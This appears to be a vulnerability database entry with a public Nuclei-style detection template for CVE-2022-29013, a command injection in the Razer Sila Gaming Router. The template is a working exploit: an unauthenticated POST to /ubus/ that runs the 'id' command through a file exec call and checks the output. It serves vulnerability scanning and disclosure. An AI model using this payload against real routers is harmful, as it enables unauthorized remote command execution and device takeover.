漏洞描述
A command injection in the command parameter of Razer Sila Gaming Router v2.0.441_api-2.0.418 allows attackers to execute arbitrary commands via a crafted POST request.
CVE-2022-29013: Razer Sila Gaming Router - Remote Code Execution
PoC代码[已公开]
id: CVE-2022-29013
info:
name: Razer Sila Gaming Router - Remote Code Execution
author: DhiyaneshDK
severity: critical
description: |
A command injection in the command parameter of Razer Sila Gaming Router v2.0.441_api-2.0.418 allows attackers to execute arbitrary commands via a crafted POST request.
reference:
- https://packetstormsecurity.com/files/166684/Razer-Sila-2.0.418-Command-Injection.html
- https://nvd.nist.gov/vuln/detail/CVE-2022-29013
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2022-29013
cwe-id: CWE-78
epss-score: 0.92744
epss-percentile: 0.99746
cpe: cpe:2.3:h:razer:sila:-:*:*:*:*:*:*:*
metadata:
max-request: 1
vendor: razer
product: sila
tags: packetstorm,cve,cve2022,razer,sila,router
http:
- method: POST
path:
- "{{BaseURL}}/ubus/"
headers:
Origin: "{{RootURL}}"
Referer: "{{ROotURL}}"
X-Requested-With: XMLHttpRequest
body: |
{"jsonrpc":"2.0","id":3,"method":"call","params":["30ebdc7dd1f519beb4b2175e9dd8463e","file","exec",{"command":"id"}]}
matchers-condition: and
matchers:
- type: regex
part: body
regex:
- 'uid=([0-9(a-z)]+) gid=([0-9(a-z)]+)'
- type: word
part: header
words:
- "application/json"
- type: status
status:
- 200
# digest: 4a0a004730450221008cb93a8c50314975c598db517249bedbc6ddfebb00e23b665bea1a1108c1253d02207012e83c3b15c3a485f5a225815b74518c4ebeb1be75d3072bfa20b2ab7016f5:922c64590222798bb761d5b6d8e72950